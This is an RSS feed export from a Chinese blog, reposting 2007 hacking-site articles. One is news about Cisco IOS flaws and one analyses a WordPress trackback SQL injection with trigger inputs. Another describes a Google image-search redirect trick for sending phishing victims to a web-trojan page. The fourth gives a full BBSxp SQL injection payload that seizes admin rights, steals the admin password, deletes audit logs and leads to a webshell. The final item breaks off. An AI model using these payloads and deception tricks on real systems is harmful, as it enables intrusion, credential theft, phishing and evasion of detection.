﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>IT博客-Lycou' Blog-文章分类-洞</title><link>http://www.cnitblog.com/lycou/category/4781.html</link><description>Lycou' Blog</description><language>zh-cn</language><lastBuildDate>Fri, 28 Oct 2011 23:32:38 GMT</lastBuildDate><pubDate>Fri, 28 Oct 2011 23:32:38 GMT</pubDate><ttl>60</ttl><item><title>思科路由器惊现漏洞 影响我国骨干网安全</title><link>http://www.cnitblog.com/lycou/articles/22518.html</link><dc:creator>Lycou' Blog</dc:creator><author>Lycou' Blog</author><pubDate>Thu, 01 Feb 2007 07:50:00 GMT</pubDate><guid>http://www.cnitblog.com/lycou/articles/22518.html</guid><wfw:comment>http://www.cnitblog.com/lycou/comments/22518.html</wfw:comment><comments>http://www.cnitblog.com/lycou/articles/22518.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/lycou/comments/commentRss/22518.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/lycou/services/trackbacks/22518.html</trackback:ping><description><![CDATA[
		<table cellspacing="0" cellpadding="0" width="100%" border="0">
				<tbody>
						<tr>
								<td valign="top">
										<table cellspacing="0" cellpadding="0" width="99%" align="center" border="0">
												<tbody>
														<tr>
																<td>
																		<table style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" cellspacing="0" cellpadding="0" width="100%" border="0">
																				<tbody>
																						<tr>
																								<td style="FONT-SIZE: 12pt; COLOR: #ff6600" align="middle" height="32">思科路由器惊现漏洞 影响我国骨干网安全</td>
																						</tr>
																						<tr>
																								<td align="middle" bgcolor="#f7f7f7" height="25">作者：佚名  来源：www.hack58.net  发布时间：2007-2-1 0:50:46  发布人：<font color="#ff0000">黑客动画吧</font></td>
																						</tr>
																						<script language="javascript"><![CDATA[
var newasp_fontsize=9;
var newasp_lineheight=12;
                                    ]]&gt;</script>
																						<tr>
																								<td>
																										<p align="right">
																												<a title="减小字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&gt;8){NewaspContentLabel.style.fontSize=(--newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(--newasp_lineheight)+&quot;pt&quot;;}">
																														<img height="15" src="http://www.hack58.net/images/1.gif" width="15" border="0" />
																														<font color="#ff6600">减小字体</font>
																												</a>
																												<a title="增大字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&lt;64){NewaspContentLabel.style.fontSize=(++newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(++newasp_lineheight)+&quot;pt&quot;;}">
																														<img height="15" src="http://www.hack58.net/images/2.gif" width="15" border="0" />
																														<font color="#ff6600">增大字体</font>
																												</a>
																										</p>
																										<div class="ContentFont" id="NewaspContentLabel" style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">
																												<font id="font_word" style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">
																														<div>CNCERT技术专家指出：“由于我国电信、网通、移动、联通、铁通等五大基础运营商核心路由器均使用思科产品，因此思科系统中存在的三个安全漏洞对我国的骨干网安全存在潜在威胁。为保障公共互联网安全，请相关用户及时修补漏洞。” </div>
																														<br />国家计算机网络应急技术处理协调中心(CNCERT)日前发布安全公告称，思科系统中存在三个安全漏洞，此漏洞影响所有运行IOS的思科设备。这是继2004年4月思科TCP漏洞之后，三年来CNCERT第一次发布思科设备漏洞。CNCERT近三年所有公告，涉及以微软居多，思科仅此两次。<br /><br />目前尚不清楚此漏洞是否造成损失。不过，CNCERT技术专家指出：“由于我国电信、网通、移动、联通、铁通等五大基础运营商核心路由器均使用思科产品，因此漏洞对我国的骨干网安全存在潜在威胁。为保障公共互联网安全，请相关用户及时修补漏洞。”<br /><br />根据安全公告，漏洞包括Cisco IOS TCP包处理漏洞、Cisco IOS IPv4伪造包漏洞、Cisco IOS IPv6伪造包漏洞。远程攻击者可以利用IOS中的漏洞让受影响的设备重载操作系统。在重载期间，由于数据包不能被正确处理，实际相当于拒绝服务攻击，持续利用漏洞会造成持续的拒绝服务攻击。<br /><br />昨日，思科相关人士的电话一直无人接听。不过记者从其官网获悉，思科已经提供了修复全部漏洞的软件，可从其官方网站下载。互联网技术专家指出，用户只要及时下载、安装补丁，将可避免遭受安全威胁。据估计，思科占据了我国超过一半以上的高端市场<br /></font>
																										</div>
																										<div>
																										</div>
																								</td>
																						</tr>
																				</tbody>
																		</table>
																</td>
														</tr>
												</tbody>
										</table>
								</td>
						</tr>
				</tbody>
		</table>
<img src ="http://www.cnitblog.com/lycou/aggbug/22518.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/lycou/" target="_blank">Lycou' Blog</a> 2007-02-01 15:50 <a href="http://www.cnitblog.com/lycou/articles/22518.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>WordPress wp-trackback.php漏洞分析</title><link>http://www.cnitblog.com/lycou/articles/22517.html</link><dc:creator>Lycou' Blog</dc:creator><author>Lycou' Blog</author><pubDate>Thu, 01 Feb 2007 07:49:00 GMT</pubDate><guid>http://www.cnitblog.com/lycou/articles/22517.html</guid><wfw:comment>http://www.cnitblog.com/lycou/comments/22517.html</wfw:comment><comments>http://www.cnitblog.com/lycou/articles/22517.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/lycou/comments/commentRss/22517.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/lycou/services/trackbacks/22517.html</trackback:ping><description><![CDATA[
		<table style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" cellspacing="0" cellpadding="0" width="100%" border="0">
				<tbody>
						<tr>
								<td style="FONT-SIZE: 12pt; COLOR: #ff6600" align="middle" height="32">WordPress wp-trackback.php漏洞分析</td>
						</tr>
						<tr>
								<td align="middle" bgcolor="#f7f7f7" height="25">作者：佚名  来源：5up3rh3i'blog  发布时间：2007-2-1 0:52:34  发布人：<font color="#ff0000">黑客动画吧</font></td>
						</tr>
						<script language="javascript"><![CDATA[
var newasp_fontsize=9;
var newasp_lineheight=12;
                                    ]]&gt;</script>
						<tr>
								<td>
										<p align="right">
												<a title="减小字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&gt;8){NewaspContentLabel.style.fontSize=(--newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(--newasp_lineheight)+&quot;pt&quot;;}">
														<img height="15" src="http://www.hack58.net/images/1.gif" width="15" border="0" />
														<font color="#ff6600">减小字体</font>
												</a>
												<a title="增大字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&lt;64){NewaspContentLabel.style.fontSize=(++newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(++newasp_lineheight)+&quot;pt&quot;;}">
														<img height="15" src="http://www.hack58.net/images/2.gif" width="15" border="0" />
														<font color="#ff6600">增大字体</font>
												</a>
										</p>
										<div class="ContentFont" id="NewaspContentLabel" style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">
												<font id="font_word" style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">
														<p>WordPress wp-trackback.php漏洞分析<br />      文/Superhei 2007/1/9<br />1.Stefan Esser大牛2007/01/05发布的WordPress Trackback Charset Decoding SQL Injection Vulnerability [1]</p>
														<p>Code:wp-trackback.php</p>
														<p>$tb_url    = $_POST['url'];<br />$title     = $_POST['title'];<br />$excerpt   = $_POST['excerpt'];<br />$blog_name = $_POST['blog_name'];<br />$charset   = $_POST['charset'];<br />.......<br />if ( function_exists('mb_convert_encoding') ) { // For international trackbacks<br /> $title     = mb_convert_encoding($title, get_settings('blog_charset'), $charset);<br /> $excerpt   = mb_convert_encoding($excerpt, get_settings('blog_charset'), $charset);<br /> $blog_name = mb_convert_encoding($blog_name, get_settings('blog_charset'), $charset);<br />}<br />.......<br />$dupe = $wpdb-&gt;get_results("SELECT * FROM $wpdb-&gt;comments WHERE comment_post_ID = '$comment_post_ID' AND comment_author_url = '$comment_author_url'");</p>
														<p>变量$charset编码post---&gt;mb_convert_encoding()转换为get_settings('blog_charset') [utf-8]----&gt;select</p>
														<p>se大牛的exp[2] 是用的uf7编码：'==&gt;+-ACc- 饶过gpc，然后通过mb_convert_encoding转化为utf-8 '&lt;==+-ACc-</p>
														<p>其实这个就是编码引起的2次攻击[3]饶过gpc引起的SqlInj。</p>
														<p>官方发布的补丁：2.0.6 wp-trackback.php</p>
														<p>// These three are stripslashed here so that they can be properly escaped after mb_convert_encoding()<br />$title     = stripslashes($_POST['title']);<br />$excerpt   = stripslashes($_POST['excerpt']);<br />$blog_name = stripslashes($_POST['blog_name']);<br />.........<br />// Now that mb_convert_encoding() has been given a swing, we need to escape these three<br />$title     = $wpdb-&gt;escape($title);<br />$excerpt   = $wpdb-&gt;escape($excerpt);<br />$blog_name = $wpdb-&gt;escape($blog_name);</p>
														<p>变量经过stripslashes()---&gt;mb_convert_encoding()---&gt;escape()---&gt;select</p>
														<p>我们看看escape() ：wp-includes\wp-db.php </p>
														<p> function escape($string) {<br />  return addslashes( $string ); // Disable rest for now, causing problems<br />  if( !$this-&gt;dbh || version_compare( phpversion(), '4.3.0' ) == '-1' )<br />   return mysql_escape_string( $string );<br />  else<br />   return mysql_real_escape_string( $string, $this-&gt;dbh );<br /> }</p>
														<p>mysql_real_escape_string()在一定的条件下是可以绕过的：<br />The addslashes() Versus mysql_real_escape_string() Debate  http://shiflett.org/archive/184<br />村雨牛牛在xcon也说过，但是mysql支持gbk的情况还是比较少的。有兴趣的可以自己测试下 :)</p>
														<p>2.rgod于2007/01/08发布的WordPress &lt;= 2.0.6 wp-trackback.php Zend_Hash_Del_Key_Or_Index / sql injection exploit [4]</p>
														<p>Code:wp-settings.php</p>
														<p>function unregister_GLOBALS() {<br /> if ( !ini_get('register_globals') )<br />  return;</p>
														<p> if ( isset($_REQUEST['GLOBALS']) )<br />  die('GLOBALS overwrite attempt detected');</p>
														<p> // Variables that shouldn't be unset<br /> $noUnset = array('GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER', '_ENV', '_FILES', 'table_prefix');<br /> <br /> $input = array_merge($_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_FILES, isset($_SESSION) &amp;&amp; is_array($_SESSION) ? $_SESSION : array());<br /> foreach ( $input as $k =&gt; $v ) <br />  if ( !in_array($k, $noUnset) &amp;&amp; isset($GLOBALS[$k]) )<br />   unset($GLOBALS[$k]);<br />}</p>
														<p>unregister_GLOBALS(); </p>
														<p>这里unset了$_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_FILES, $_SESSION 等提交的变量。</p>
														<p>Code:wp-trackback.php</p>
														<p>if ( !intval( $tb_id ) ) //注意这个<br /> trackback_response(1, 'I really need an ID for this to work.');</p>
														<p>.................</p>
														<p>if ( !empty($tb_url) &amp;&amp; !empty($title) &amp;&amp; !empty($tb_url) ) {<br /> header('Content-Type: text/xml; charset=' . get_option('blog_charset') );</p>
														<p> $pingstatus = $wpdb-&gt;get_var("SELECT ping_status FROM $wpdb-&gt;posts WHERE ID = $tb_id");<br />......</p>
														<p>$tb_id没有’ 通过unset后存在end_Hash_Del_Key_Or_Index漏洞，导致注射。在分析时候提交：tb_id='&amp;1740009377=1&amp;496546471=1<br />返回：I really need an ID for this to work 原来是在 ：<br />if ( !intval( $tb_id ) ) //这里拦住了。<br /> trackback_response(1, 'I really need an ID for this to work.');<br /> <br />提交tb_id=1'&amp;1740009377=1&amp;496546471=1 成功触发，这里引发了一比较有意思的问题 ：<br />&lt;? <br />//test.php<br />print intval($_REQUEST["id"]); <br />?&gt;<br />提交test.php?id=a1 得到 0，提交test.php?id=12a 得到 12。<br />可以看出 intval是根据第1个字符来判断的，这样如果是像wp这样的判断：if ( !intval( $_ ) ) 还是有安全隐患的。</p>
														<p>参考：<br />[1]：http://www.hardened-php.net/advisory_022007.141.html<br />[2]：http://www.milw0rm.com/exploits/3095<br />[3]：http://superhei.blogbus.com/files/1157120596.ppt<br />[4]：http://retrogod.altervista.org/wordpress_206_zhdkoi_sql.html<br /></p>
												</font>
										</div>
										<div>
										</div>
								</td>
						</tr>
				</tbody>
		</table>
<img src ="http://www.cnitblog.com/lycou/aggbug/22517.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/lycou/" target="_blank">Lycou' Blog</a> 2007-02-01 15:49 <a href="http://www.cnitblog.com/lycou/articles/22517.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>google图片搜索钓鱼随笔</title><link>http://www.cnitblog.com/lycou/articles/22514.html</link><dc:creator>Lycou' Blog</dc:creator><author>Lycou' Blog</author><pubDate>Thu, 01 Feb 2007 07:47:00 GMT</pubDate><guid>http://www.cnitblog.com/lycou/articles/22514.html</guid><wfw:comment>http://www.cnitblog.com/lycou/comments/22514.html</wfw:comment><comments>http://www.cnitblog.com/lycou/articles/22514.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/lycou/comments/commentRss/22514.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/lycou/services/trackbacks/22514.html</trackback:ping><description><![CDATA[
		<table cellspacing="0" cellpadding="0" width="100%" border="0">
				<tbody>
						<tr>
								<td valign="top">
										<table cellspacing="0" cellpadding="0" width="99%" align="center" border="0">
												<tbody>
														<tr>
																<td>
																		<table style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" cellspacing="0" cellpadding="0" width="100%" border="0">
																				<tbody>
																						<tr>
																								<td style="FONT-SIZE: 12pt; COLOR: #ff6600" align="middle" height="32">google图片搜索钓鱼随笔</td>
																						</tr>
																						<tr>
																								<td align="middle" bgcolor="#f7f7f7" height="25">作者：fhod  来源：www.hack58.net  发布时间：2007-1-31 10:11:54  发布人：<font color="#ff0000">黑客动画吧</font></td>
																						</tr>
																						<script language="javascript"><![CDATA[
var newasp_fontsize=9;
var newasp_lineheight=12;
                                    ]]&gt;</script>
																						<tr>
																								<td>
																										<p align="right">
																												<a title="减小字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&gt;8){NewaspContentLabel.style.fontSize=(--newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(--newasp_lineheight)+&quot;pt&quot;;}">
																														<img height="15" src="http://www.hack58.net/images/1.gif" width="15" border="0" />
																														<font color="#ff6600">减小字体</font>
																												</a>
																												<a title="增大字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&lt;64){NewaspContentLabel.style.fontSize=(++newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(++newasp_lineheight)+&quot;pt&quot;;}">
																														<img height="15" src="http://www.hack58.net/images/2.gif" width="15" border="0" />
																														<font color="#ff6600">增大字体</font>
																												</a>
																										</p>
																										<div class="ContentFont" id="NewaspContentLabel" style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">
																												<font id="font_word" style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">在google查看手机图片的时候<br />打开搜索结果出来个地址<br /><br />http://images.google.cn/imgres?imgurl=http://image2.sina.com.cn/IT/mobile/n/2006-09-10/U513P2T1D1128552F13DT20060910151349.jpg&amp;imgrefurl=http://tech.sina.com.cn/mobile/n/2006-09-10/1 ... M:&amp;tbnh=95&amp;tbnw=127&amp;prev=/images%3Fq%3Di908%26svnum%3D10%26complete%3D1%26hl%3Dzh-CN%26newwindow%3D1%26sa%3DN<br /><br />引用的是<br />http://tech.sina.com.cn/mobile/n/2006-09-10/15131128552.shtml<br />这个页面的内容<br /><br />然后我就想是不是可以用来欺骗<br />经过简短比较<br /><br />http://images.google.cn/imgres?imgurl=g&amp; ... /www.ciker.org/index.asp<br /><br />这个是绝对可以达到欺骗的目的的..<br /><br />imgres 和imgrefurl参数少一个都不能打开..<br /><br />效果图<br /><img onmouseover="this.style.cursor='hand';" style="CURSOR: hand" onclick="window.open(this.src);" height="554" alt="按此在新窗口打开图片" src="http://www.hack58.net/Article/UploadPic/2007-1/2007131101131928.jpg" width="518" onload="&lt;i" />javascript:DrawImage(this); border=0&gt;<br /><br />http://www.ciker.org/index.asp<br />可以换为自己的网马地址..URL加密后可以增强欺骗性<br /><br />http://images.google.cn/imgres?imgurl=g&amp;imgrefurl=htt ... 9%6b%65%72%2e%6f%72%67/index.asp<br /></font>
																										</div>
																								</td>
																						</tr>
																				</tbody>
																		</table>
																</td>
														</tr>
												</tbody>
										</table>
								</td>
						</tr>
				</tbody>
		</table>
<img src ="http://www.cnitblog.com/lycou/aggbug/22514.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/lycou/" target="_blank">Lycou' Blog</a> 2007-02-01 15:47 <a href="http://www.cnitblog.com/lycou/articles/22514.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>BBSxp log注入</title><link>http://www.cnitblog.com/lycou/articles/22513.html</link><dc:creator>Lycou' Blog</dc:creator><author>Lycou' Blog</author><pubDate>Thu, 01 Feb 2007 07:46:00 GMT</pubDate><guid>http://www.cnitblog.com/lycou/articles/22513.html</guid><wfw:comment>http://www.cnitblog.com/lycou/comments/22513.html</wfw:comment><comments>http://www.cnitblog.com/lycou/articles/22513.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/lycou/comments/commentRss/22513.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/lycou/services/trackbacks/22513.html</trackback:ping><description><![CDATA[
		<table style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" cellspacing="0" cellpadding="0" width="100%" border="0">
				<tbody>
						<tr>
								<td style="FONT-SIZE: 12pt; COLOR: #ff6600" align="middle" height="32">BBSxp log注入</td>
						</tr>
						<tr>
								<td align="middle" bgcolor="#f7f7f7" height="25">作者：WhyTt  来源：影子鹰安全网络  发布时间：2007-1-31 10:09:09  发布人：<font color="#ff0000">黑客动画吧</font></td>
						</tr>
						<script language="javascript"><![CDATA[
var newasp_fontsize=9;
var newasp_lineheight=12;
                                    ]]&gt;</script>
						<tr>
								<td>
										<p align="right">
												<a title="减小字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&gt;8){NewaspContentLabel.style.fontSize=(--newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(--newasp_lineheight)+&quot;pt&quot;;}">
														<img height="15" src="http://www.hack58.net/images/1.gif" width="15" border="0" />
														<font color="#ff6600">减小字体</font>
												</a>
												<a title="增大字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&lt;64){NewaspContentLabel.style.fontSize=(++newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(++newasp_lineheight)+&quot;pt&quot;;}">
														<img height="15" src="http://www.hack58.net/images/2.gif" width="15" border="0" />
														<font color="#ff6600">增大字体</font>
												</a>
										</p>
										<div class="ContentFont" id="NewaspContentLabel" style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">
												<font id="font_word" style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">
														<div>
																<p>参数直接带如查询的函数和过程</p>
																<p>menu<br />BBSList<br />ForumTree<br />Log<br />ShowRank<br />ShowRole<br />DelFile//deletefile</p>
																<p>还记的以前在blog发的一篇bbsxp分析文档，http://computer.mblogger.cn/whytt/posts/59457.aspx</p>
																<p>由于当时只看到在监狱那里有对log的引用，而没看到这里居然还有，所以一直没继续看下去，考试大部分完了，现在每天没撒事，于是看看代码打发时间，今天早上选的是bbsxp来开刀，嘿嘿~~~~</p>
																<p>在bank.asp这个文件中，在倒数第6行那里有个对log过程的引用，<br />就是在银行转帐这里，思路是这里的。</p>
																<p>先注册2个用户，拿一个用户跟几个帖子，赚10个金币，然后去银行那里去转帐，选自己刚才注册的另一个用户，然后抓个包，修改数据包里的相关参数，具体请看log过程</p>
																<p>
																</p>
																<div>
																		<font size="2">sub Log(Message)<br />if Request.ServerVariables("Query_String")&lt;&gt;"" then Query_String="?"&amp;Request.ServerVariables("Query_String")&amp;""<br />Conn.Execute("insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('"&amp;CookieUserName&amp;"','"&amp;Request.ServerVariables("REMOTE_ADDR")&amp;"','"&amp;HTMLEncode(Request.Servervariables("HTTP_User_AGENT"))&amp;"','"&amp;Request.ServerVariables("request_method")&amp;"','http://"&amp;Request.ServerVariables("server_name")&amp;""&amp;Request.ServerVariables("script_name")&amp;""&amp;Query_String&amp;"','"&amp;Request.ServerVariables("HTTP_REFERER")&amp;"','"&amp;Err.Description&amp;"','"&amp;Request.Form&amp;"','"&amp;Message&amp;"')")<br />end sub</font>
																</div>
																<br />
																<p>我们就拿其中的Request.ServerVariables("HTTP_REFERER")来注入，这个log过程在我转帐的时候执行的查询</p>
																<p>
																</p>
																<div>
																		<font size="2">insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('whytt1','127.0.0.1','Mozilla/4.0 (compatible; MSIE 6.0; <a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">Windows</font></a> NT 5.0)','POST','http://127.0.0.1/Bank.asp&amp;#39;,&amp;#39;http://127.0.0.1/Bank.asp&amp;#39;,&amp;#39;&amp;#39;,&amp;#39;menu=virement&amp;qmoney=10&amp;dxname=whytt&amp;B2=+%C8%B7+%B6%A8+&amp;#39;,&amp;#39;whytt1 通过银行转帐 ￥10 给 whytt')</font>
																</div>
																<p>
																</p>
																<p>其中最后一个http://127.0.0.1/Bank.asp就是我们需要修改的Request.ServerVariables("HTTP_REFERER")，为： 
</p>
																<p>
																</p>
																<div>
																		<font size="2">http://127.0.0.1/Bank.asp&amp;#39;,&amp;#39;&amp;#39;,&amp;#39;menu=virement&amp;qmoney=10&amp;dxname=whytt&amp;B2=+%C8%B7+%B6%A8+&amp;#39;,&amp;#39;whytt1 通过银行转帐 ￥10 给 whytt');update bbsxp_users set userRoleid=1,usermoney=999,usermail=(select top 1 adminpassword from bbsxp_sitesettings) where username='whytt';update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='whytt');delete from bbsxp_log where username='tt521' or username='xiaot';--</font>
																</div>
																<p>
																</p>
																<p>这样带入查询就是：</p>
																<p>
																</p>
																<div>
																		<font size="2">insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('whytt1','127.0.0.1','Mozilla/4.0 (compatible; MSIE 6.0; <a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">Windows</font></a> NT 5.0)','POST','http://127.0.0.1/Bank.asp&amp;#39;,&amp;#39;http://127.0.0.1/Bank.asp&amp;#39;,&amp;#39;&amp;#39;,&amp;#39;menu=virement&amp;qmoney=10&amp;dxname=whytt&amp;B2=+%C8%B7+%B6%A8+&amp;#39;,&amp;#39;whytt1 通过银行转帐 ￥10 给 whytt');update bbsxp_users set userRoleid=1,usermoney=999,usermail=(select top 1 adminpassword from bbsxp_sitesettings) where username='whytt';update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='whytt');delete from bbsxp_log where username='tt521' or username='xiaot';--</font>
																</div>
																<p>这样就把我们的whytt设置成了管理员了，而且把后台密码输出到whytt的油箱那里，而且给自己加上了999 的金币，哈哈够用了吧。最后删除log表中我们的操作记录，最后然后进后台看web的绝对路径，然后通过backup log来拿webshell。 
</p>
																<p>
																</p>
																<p>By WhyTt</p>
																<p>补充：为了进一步确认数据库的类型，可以通过bbsxp的一个小bug来实现。 
</p>
																<p>
																</p>
																<div>
																		<font size="2">http://127.0.0.1/UserTop.asp?order=&amp;#39;whytt&amp;#39;&amp;#39;0</font>
																</div>
																<p>这里有时候不暴错，就在后面乱加些字符吧。。呵呵~~~我测试过，加了几次就暴错，就看到数据库的类型了。 ：） 
</p>
																<p>
																</p>
																<p>后来发现用bank.asp这里来搞非常费力，要有足够的金币，所以又专门找了下其他asp文件，发现在</p>
																<p>
																</p>
																<div>
																		<font size="2">if Request.Form("UpFileID")&lt;&gt;"" then<br />UpFileID=split(Request.form("UpFileID"),",")<br />for i = 0 to ubound(UpFileID)-1<br />Conn.execute("update [BBSXP_UpFiles] set Category='"&amp;Category&amp;"',Description='"&amp;Subject&amp;"' where id="&amp;int(UpFileID(i))&amp;" and UserName='"&amp;CookieUserName&amp;"'")<br />next<br />end if<br />response.write ("&lt;script&gt;alert()&lt;/script&gt;")<br />Log("修改帖子成功，主题ID："&amp;ThreadID&amp;"，帖子ID："&amp;PostID&amp;"")</font>
																</div>
																<p>
																</p>
																<p>这个editpost.asp文件也有对log过程的引用，于是方法简单了，发个帖子，然后edit，然后修改抓到的数据包，重复修改Request.ServerVariables("HTTP_REFERER")，就可以达到同样的效果，呵呵~~</p>
														</div>
												</font>
										</div>
										<div>
										</div>
								</td>
						</tr>
				</tbody>
		</table>
<img src ="http://www.cnitblog.com/lycou/aggbug/22513.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/lycou/" target="_blank">Lycou' Blog</a> 2007-02-01 15:46 <a href="http://www.cnitblog.com/lycou/articles/22513.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>再暴BBSxp 7.0 Beta 2漏洞</title><link>http://www.cnitblog.com/lycou/articles/22512.html</link><dc:creator>Lycou' Blog</dc:creator><author>Lycou' Blog</author><pubDate>Thu, 01 Feb 2007 07:43:00 GMT</pubDate><guid>http://www.cnitblog.com/lycou/articles/22512.html</guid><wfw:comment>http://www.cnitblog.com/lycou/comments/22512.html</wfw:comment><comments>http://www.cnitblog.com/lycou/articles/22512.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/lycou/comments/commentRss/22512.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/lycou/services/trackbacks/22512.html</trackback:ping><description><![CDATA[
		<p>
		</p>
		<table style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" cellspacing="0" cellpadding="0" width="100%" border="0">
				<tbody>
						<tr>
								<td style="FONT-SIZE: 12pt; COLOR: #ff6600" align="middle" height="32">再暴BBSxp 7.0 Beta 2漏洞</td>
						</tr>
						<tr>
								<td align="middle" bgcolor="#f7f7f7" height="25">作者：TTFCT  来源：www.hack58.net  发布时间：2007-1-31 10:10:43  发布人：<font color="#ff0000">黑客动画吧</font></td>
						</tr>
						<script language="javascript"><![CDATA[
var newasp_fontsize=9;
var newasp_lineheight=12;
                                    ]]&gt;</script>
						<tr>
								<td>
										<p align="right">
												<a title="减小字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&gt;8){NewaspContentLabel.style.fontSize=(--newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(--newasp_lineheight)+&quot;pt&quot;;}">
														<img height="15" src="http://www.hack58.net/images/1.gif" width="15" border="0" />
														<font color="#ff6600">减小字体</font>
												</a>
												<a title="增大字体" style="CURSOR: hand; POSITION: relative" onclick="if(newasp_fontsize&lt;64){NewaspContentLabel.style.fontSize=(++newasp_fontsize)+&quot;pt&quot;;NewaspContentLabel.style.lineHeight=(++newasp_lineheight)+&quot;pt&quot;;}">
														<img height="15" src="http://www.hack58.net/images/2.gif" width="15" border="0" />
														<font color="#ff6600">增大字体</font>
												</a>
										</p>
										<div class="ContentFont" id="NewaspContentLabel" style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">
												<font id="font_word" style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">
														<p>
